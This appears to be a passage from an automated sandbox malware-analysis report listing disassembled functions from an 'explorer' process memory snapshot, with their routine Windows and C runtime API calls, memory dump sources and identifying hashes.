                                                                            • Instruction ID: d721a906d6991b57ca88267a885f3f854e2b4f3116113d4e2718729905043507
                                                                            • Opcode Fuzzy Hash: 56610d7bd2b221a8c924720ea80c9a1be984cec2133672938cd12e11cb46a69e
                                                                            • Instruction Fuzzy Hash: 1CE01A30204B8482E3049B62E4A876962E2F784750F144569F24783AA4DF3CC448D200
                                                                            Function 00BF8290 Relevance: 6.4, APIs: 5, Instructions: 175stringmemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrlen$AllocLocal
                                                                            • String ID:
                                                                            • API String ID: 2140729754-0
                                                                            • Opcode ID: 04693237d1cf4ad59c31fcf94db3715ee6b18c0804d95c00fa60367a52ec5e57
                                                                            • Instruction ID: 4ad3b8f850be182354679c76362217e557974818e9f821a3eb5501c8b3249815
                                                                            • Opcode Fuzzy Hash: 04693237d1cf4ad59c31fcf94db3715ee6b18c0804d95c00fa60367a52ec5e57
                                                                            • Instruction Fuzzy Hash: 4281B672619A84CBD760CB69E49472AB7E1F788B94F104125EB8E87B68DF7CC4498F00
                                                                            Function 00BFE3A0 Relevance: 6.3, APIs: 5, Instructions: 42memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$Alloc
                                                                            • String ID:
                                                                            • API String ID: 3098330729-0
                                                                            • Opcode ID: c51b5ce4f9c023af63ac176956201e20ba1f20a90f1d396e3649a0531b0c4900
                                                                            • Instruction ID: 4b024e7627fa794f217b5b3a187a2e8641fad65be2b1e42d9034bec18dfbffd9
                                                                            • Opcode Fuzzy Hash: c51b5ce4f9c023af63ac176956201e20ba1f20a90f1d396e3649a0531b0c4900
                                                                            • Instruction Fuzzy Hash: D711A276618B8486E7249F55E4A472EB7A0F7C8794F540629EB8E43B68CF7CC588CB00
                                                                            Function 00C0B008 Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00C08548: _getptd.LIBCMT ref: 00C0854C
                                                                            • _getptd.LIBCMT ref: 00C0B047
                                                                              • Part of subcall function 00C0AC68: _amsg_exit.LIBCMT ref: 00C0AC7E
                                                                            • _SetImageBase.LIBCMT ref: 00C0B11A
                                                                            • _getptd.LIBCMT ref: 00C0B148
                                                                            • _getptd.LIBCMT ref: 00C0B156
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _getptd$BaseImage_amsg_exit
                                                                            • String ID:
                                                                            • API String ID: 2306399499-0
                                                                            • Opcode ID: 820a420128445b834781f5b02e45248ebb4483b0580a0986e614cad34156e6cf
                                                                            • Instruction ID: 75f2416d829a14d9be9366cd9a004b7e5118640c130ca0a41941ddfcbc7129a8
                                                                            • Opcode Fuzzy Hash: 820a420128445b834781f5b02e45248ebb4483b0580a0986e614cad34156e6cf
                                                                            • Instruction Fuzzy Hash: 9D31B232300B4582DB21EB15D89226DA764FB85F9CB55C221DA69437F1DF38C986E301
                                                                            Function 00C128B4 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _lock.LIBCMT ref: 00C128C8
                                                                              • Part of subcall function 00C10B64: _amsg_exit.LIBCMT ref: 00C10B8E
                                                                            • fclose.LIBCMT ref: 00C128F8
                                                                            • DeleteCriticalSection.KERNEL32(?,?,?,?,?,00C10227), ref: 00C1291C
                                                                            • free.LIBCMT ref: 00C1292D
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalDeleteSection_amsg_exit_lockfclosefree
                                                                            • String ID:
                                                                            • API String ID: 594724896-0
                                                                            • Opcode ID: 78b2622f5411a723218518f8bc3c4c94124d5cfbb3948ed22ac017eabad8ec1a
                                                                            • Instruction ID: e119d69cf149e16da7715e599009316f769e46470674e0e91008fc5f3c67a105
                                                                            • Opcode Fuzzy Hash: 78b2622f5411a723218518f8bc3c4c94124d5cfbb3948ed22ac017eabad8ec1a
                                                                            • Instruction Fuzzy Hash: 2811823A204A4492E710DB19E8903ACB770F795B54F254315DA9A473B5CF35C8A2E708
                                                                            Function 00C0DA14 Relevance: 6.0, APIs: 4, Instructions: 45COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _amsg_exit$_getptd_lockfree
                                                                            • String ID:
                                                                            • API String ID: 2148533958-0
                                                                            • Opcode ID: 934fc7f5fcc5656f0e9bbb655596b2fe2c7a265561027f9620a6668bad039849
                                                                            • Instruction ID: 6184f19fdd3aea89cb2d952f16c12d0fd6903bf3c4df64795e2a39e62dcf4fbc
                                                                            • Opcode Fuzzy Hash: 934fc7f5fcc5656f0e9bbb655596b2fe2c7a265561027f9620a6668bad039849
                                                                            • Instruction Fuzzy Hash: 35117032319B80C6EB589B91E4907693375F784B40F9C4226EE1E03796CF38C596EB00
                                                                            Function 00C0AB04 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FlsFree.KERNEL32(?,?,?,?,00C0AE39,?,?,00000000,00C0981F), ref: 00C0AB13
                                                                            • DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00C0AE39), ref: 00C10A0F
                                                                            • free.LIBCMT ref: 00C10A18
                                                                            • DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00C0AE39), ref: 00C10A3F
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalDeleteSection$Freefree
                                                                            • String ID:
                                                                            • API String ID: 1250194111-0
                                                                            • Opcode ID: fb3b572fb4d9322f5a20da82e8bae38958ce4eff5db9c7211888d1abbf611538
                                                                            • Instruction ID: ca8ad337ea60d6bb516a64695bb2a7f8eb85f032cfa4c447c2f5d67785755045
                                                                            • Opcode Fuzzy Hash: fb3b572fb4d9322f5a20da82e8bae38958ce4eff5db9c7211888d1abbf611538
                                                                            • Instruction Fuzzy Hash: 1B11A536A41B80C6FB159F15F4507A87360FB56B64F6C0311DAAA07266CF78C9C5D701
                                                                            Function 00C0E2E4 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _amsg_exit_getptd$_lock
                                                                            • String ID:
                                                                            • API String ID: 3670291111-0
                                                                            • Opcode ID: afed70bff10aed78a38c27eca1b356154239f2ec574e8e854ec517cc0c9d66c4
                                                                            • Instruction ID: fba2c3a22eeba2615f9a1475809856734a916cfa3e7e8418aa03c32dc5ea8323
                                                                            • Opcode Fuzzy Hash: afed70bff10aed78a38c27eca1b356154239f2ec574e8e854ec517cc0c9d66c4
                                                                            • Instruction Fuzzy Hash: 04F03761642600C7FB18AB61C891BBC2765FB55F40F5D4678DE09073E2DF289981F715
                                                                            Function 00BE1860 Relevance: 6.0, APIs: 4, Instructions: 21synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$EventObjectSingleWait
                                                                            • String ID:
                                                                            • API String ID: 2857295742-0
                                                                            • Opcode ID: 777dbf8fc3632375601c26065b3abb19c333506527608912849f89bd8911c77b
                                                                            • Instruction ID: d0a70a8c17bc86ee2ddf8396bdb451ed69af08b28f78bbdacaaac1cfd1219bdb
                                                                            • Opcode Fuzzy Hash: 777dbf8fc3632375601c26065b3abb19c333506527608912849f89bd8911c77b
                                                                            • Instruction Fuzzy Hash: BFF09230900E5081F7149F1AFCB8B5833A2F786B59F648315D40AA6AB8CF7C88CDE712
                                                                            Function 00BE4140 Relevance: 6.0, APIs: 4, Instructions: 21synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$EventObjectSingleWait
                                                                            • String ID:
                                                                            • API String ID: 2857295742-0
                                                                            • Opcode ID: c0ac94fd53c9be6ddf8ab387b376ddcce9b1106a022f3e2794b766a36c00cf22
                                                                            • Instruction ID: efb8536dca41243fb9c0a4feead94ddcb3f677d42f0be248315514c96d268525
                                                                            • Opcode Fuzzy Hash: c0ac94fd53c9be6ddf8ab387b376ddcce9b1106a022f3e2794b766a36c00cf22
                                                                            • Instruction Fuzzy Hash: C2F07F38600E4083FB249F16EC78B6463A0F796B69F500315D81A862B8CF7C88C9E302
                                                                            Function 00C08378 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _errno_invalid_parameter_noinfo
                                                                            • String ID: B
                                                                            • API String ID: 2959964966-1255198513
                                                                            • Opcode ID: 6d84e33dfcd121de1eafe8823227b1be611e45426ac9c9a175a7570934149db3
                                                                            • Instruction ID: 8213fd0bfcc095dc8e1b4c4b94c3b0ebc65234f7f26040f8cd13d48750bbb35e
                                                                            • Opcode Fuzzy Hash: 6d84e33dfcd121de1eafe8823227b1be611e45426ac9c9a175a7570934149db3
                                                                            • Instruction Fuzzy Hash: 9021B072B04A60C9EB12DFB5E85079C3B74E704BA8F548221AE9A1ABD9DF38C549D700
                                                                            Function 00BFA9B1 Relevance: 5.0, APIs: 4, Instructions: 26COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeLocal$CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2045616094-0
                                                                            • Opcode ID: 12948df0c498c71752decdfb20f4046d16fa531f621b976a4d48b112d2b8850d
                                                                            • Instruction ID: 5c43f085337adfc1e9c0900740dedd8ac5365c2db6ee83abf0e2af170e7653e6
                                                                            • Opcode Fuzzy Hash: 12948df0c498c71752decdfb20f4046d16fa531f621b976a4d48b112d2b8850d
                                                                            • Instruction Fuzzy Hash: B4016636628A84C2EB259B55F8A476E7371F7C8B91F504212EA4E43764CE38D98DDB00
                                                                            Function 00BFA928 Relevance: 5.0, APIs: 4, Instructions: 26COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeLocal$CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2045616094-0
                                                                            • Opcode ID: a2293f295a2fa7d97544b2817141554d3648111c2d3c3cc1c630462ab1cacff4
                                                                            • Instruction ID: 5c43f085337adfc1e9c0900740dedd8ac5365c2db6ee83abf0e2af170e7653e6
                                                                            • Opcode Fuzzy Hash: a2293f295a2fa7d97544b2817141554d3648111c2d3c3cc1c630462ab1cacff4
                                                                            • Instruction Fuzzy Hash: B4016636628A84C2EB259B55F8A476E7371F7C8B91F504212EA4E43764CE38D98DDB00
                                                                            Function 00BFA964 Relevance: 5.0, APIs: 4, Instructions: 26COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeLocal$CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2045616094-0
                                                                            • Opcode ID: 349387b39aee734f2e1a217bf4617260ce4ec2a9e2100056ec747b03cee3a5c8
                                                                            • Instruction ID: 5c43f085337adfc1e9c0900740dedd8ac5365c2db6ee83abf0e2af170e7653e6
                                                                            • Opcode Fuzzy Hash: 349387b39aee734f2e1a217bf4617260ce4ec2a9e2100056ec747b03cee3a5c8
                                                                            • Instruction Fuzzy Hash: B4016636628A84C2EB259B55F8A476E7371F7C8B91F504212EA4E43764CE38D98DDB00
                                                                            Function 00BFD033 Relevance: 5.0, APIs: 4, Instructions: 25COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C41000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C48000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4654075564.0000000000C4C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_be0000_explorer.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$FreeLocal
                                                                            • String ID:
                                                                            • API String ID: 2513001865-0
                                                                            • Opcode ID: 22895e9f0ad57eb89ae3befc25affe5af3445f895d3ec8ceecc31fa57cfc47ed
                                                                            • Instruction ID: 3bbb69d34e733559cd660b6f44448c72b269daf94a03af583641f45dc1d0e095
                                                                            • Opcode Fuzzy Hash: 22895e9f0ad57eb89ae3befc25affe5af3445f895d3ec8ceecc31fa57cfc47ed
                                                                            • Instruction Fuzzy Hash: 6301A420104A6492FB219B14F8B8BBA33A1F385B65F640365D64A826B0CFBC88CED305
                                                                            Function 00BFD00B Relevance: 5.0, APIs: 4, Instructions: 25COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.4653824878.0000000000BE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: true
                                                                            • Associated: 00000004.00000002.4653791369.0000000000BE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.4653913005.0000000000C24000.00000004.00001000.00020000.00000000.sdmpDownload File
